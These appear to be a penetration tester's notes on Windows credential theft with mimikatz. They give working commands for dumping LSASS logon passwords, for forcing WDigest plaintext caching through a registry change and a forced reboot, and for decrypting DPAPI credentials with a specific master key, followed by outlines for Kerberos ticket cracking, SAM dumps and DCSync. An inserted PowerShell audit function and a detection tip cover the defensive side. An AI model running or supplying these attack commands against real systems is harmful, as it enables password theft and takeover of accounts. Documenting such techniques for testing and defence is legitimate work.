mimikatz

privilege::debug

to dump the saved logon passwords from LSASS

sekurlsa::logonpasswords
  • If the password field comes back as (null), WDigest caching is off; the key below turns it back on (takes effect after a reboot)

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

- to check
reg query "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"

- restart the system
shutdown /r /t 0 /f
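Defender's counterpart to the reg add / reg query pair above, added here as an example and not part of the original notes: a PowerShell function that audits the WDigest UseLogonCredential value and optionally resets it to 0. The function name and the -Remediate switch are my own; it assumes an elevated PowerShell 5.1+ session on the host being checked. On Windows 8.1 / Server 2012 R2 and later a missing value means plaintext caching is already off; older systems need KB2871997 before the value is honoured at all.

```powershell
# Added example (not from the original notes): audit the WDigest setting that
# the reg add command above flips to 1, and reset it if asked to.
# Assumptions: elevated PowerShell 5.1+ on the host being audited.

function Test-WDigestCredentialCaching {
    [CmdletBinding()]
    param(
        # Reset the value to 0 instead of only reporting it (needs admin rights).
        [switch]$Remediate
    )

    $regPath   = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
    $valueName = 'UseLogonCredential'

    # Returns $null when the value (or the key) does not exist.
    $current = Get-ItemProperty -Path $regPath -Name $valueName -ErrorAction SilentlyContinue |
        Select-Object -ExpandProperty $valueName -ErrorAction SilentlyContinue

    # Windows 8.1 / Server 2012 R2 and later: absent value == caching disabled.
    # Earlier versions only honour the value once KB2871997 is installed.
    if ($null -eq $current) {
        $state = 'absent (default on 8.1/2012 R2 and later: not cached)'
    } elseif ($current -eq 0) {
        $state = 'disabled'
    } else {
        $state = "ENABLED (value $current): plaintext passwords are cached in LSASS"
    }

    $finding = ($null -ne $current -and $current -ne 0)

    if ($Remediate -and $finding) {
        Set-ItemProperty -Path $regPath -Name $valueName -Value 0 -Type DWord
        Write-Warning "Reset $valueName to 0. Credentials cached before the change stay in LSASS until the next reboot."
    }

    [pscustomobject]@{
        Computer           = $env:COMPUTERNAME
        UseLogonCredential = $current
        State              = $state
        Finding            = $finding
    }
}

# Report only; add -Remediate to reset a value of 1 back to 0.
Test-WDigestCredentialCaching
```

Because the reg add above is the single change an attacker needs, the value is worth watching in addition to auditing it: a registry value-set event on that path (for example Sysmon Event ID 13) with UseLogonCredential = 1 is a high-signal alert, and the follow-up forced reboot in the notes is the second half of the same pattern.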

DPAPI

  • to get the master key

.\mimikatz.exe "dpapi::masterkey /in:C:\users\ppotts\appdata\roaming\microsoft\protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /rpc" exit
  • Getting creds after getting the master key

.\mimikatz.exe "dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\18A1927A997A794B65E9849883AC3F3E /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166" exit

Extracting Tickets from Memory with Mimikatz

  • Preparing the Base64 Blob for Cracking

  • Placing the Output into a File as .kirbi

Next, we can use this version of the kirbi2john.py tool to extract the Kerberos ticket from the TGS file.

  • Extracting the Kerberos Ticket using kirbi2john.py

This will create a file called crack_file. We then must modify the file a bit to be able to use Hashcat against the hash.

  • Modifying crack_file for Hashcat

  • Cracking the Hash with Hashcat

If we decide to skip the base64 output with Mimikatz and instead run kerberos::list /export at the mimikatz # prompt, the .kirbi file (or files) will be written to disk. In this case, we can download the file(s) and run kirbi2john.py against them directly, skipping the base64 decoding step.

Infinite issue

  • use the non-interactive form instead: pass the commands as arguments followed by exit, as in the DPAPI examples above

SAM Dump

  • Dump Hives with reg save

DCSync
